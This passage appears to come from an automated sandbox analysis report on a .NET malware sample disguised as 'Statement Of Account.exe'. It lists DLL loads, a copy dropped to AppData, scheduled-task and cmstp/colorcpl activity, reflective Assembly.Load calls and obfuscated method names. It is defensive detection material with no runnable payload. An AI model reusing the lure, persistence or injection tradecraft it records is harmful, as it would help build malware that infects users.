Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Statement Of Account.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Statement Of Account.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Statement Of Account.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Statement Of Account.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: Statement Of Account.exe, Form1.cs .Net Code: InitializeComponent
Source: SdYCcXyq.exe.0.dr, Form1.cs .Net Code: InitializeComponent
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs .Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs .Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_014AF1D0 push esp; iretd 0_2_014AF1D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD push ecx; mov dword ptr [esp], ecx 8_2_00F709B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F41FEC push eax; iretd 8_2_00F41FED
Source: C:\Windows\explorer.exe Code function: 9_2_0F424B02 push esp; retn 0000h 9_2_0F424B03
Source: C:\Windows\explorer.exe Code function: 9_2_0F424B1E push esp; retn 0000h 9_2_0F424B1F
Source: C:\Windows\explorer.exe Code function: 9_2_0F4249B5 push esp; retn 0000h 9_2_0F424AE7
Source: C:\Windows\explorer.exe Code function: 9_2_0F9079B5 push esp; retn 0000h 9_2_0F907AE7
Source: C:\Windows\explorer.exe Code function: 9_2_0F907B1E push esp; retn 0000h 9_2_0F907B1F
Source: C:\Windows\explorer.exe Code function: 9_2_0F907B02 push esp; retn 0000h 9_2_0F907B03
Source: C:\Windows\explorer.exe Code function: 9_2_109989B5 push esp; retn 0000h 9_2_10998AE7
Source: C:\Windows\explorer.exe Code function: 9_2_10998B1E push esp; retn 0000h 9_2_10998B1F
Source: C:\Windows\explorer.exe Code function: 9_2_10998B02 push esp; retn 0000h 9_2_10998B03
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_00DAF1D0 push esp; iretd 11_2_00DAF1D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00417024 push ecx; iretd 14_2_00417025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004170C2 push edx; ret 14_2_004170CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004073EB push ebp; ret 14_2_004073EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00416CC8 push D1939A9Fh; retf 14_2_00416CCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D4B5 push eax; ret 14_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D56C push eax; ret 14_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D502 push eax; ret 14_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D50B push eax; ret 14_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148B008 push es; iretd 14_2_0148B009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148135E push eax; iretd 14_2_01481369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148225F pushad ; ret 14_2_014827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014827FA pushad ; ret 14_2_014827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01489939 push es; iretd 14_2_01489940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B09AD push ecx; mov dword ptr [esp], ecx 14_2_014B09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148283D push eax; iretd 14_2_01482858
Source: Statement Of Account.exe Static PE information: section name: .text entropy: 7.029755289423976
Source: SdYCcXyq.exe.0.dr Static PE information: section name: .text entropy: 7.029755289423976
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
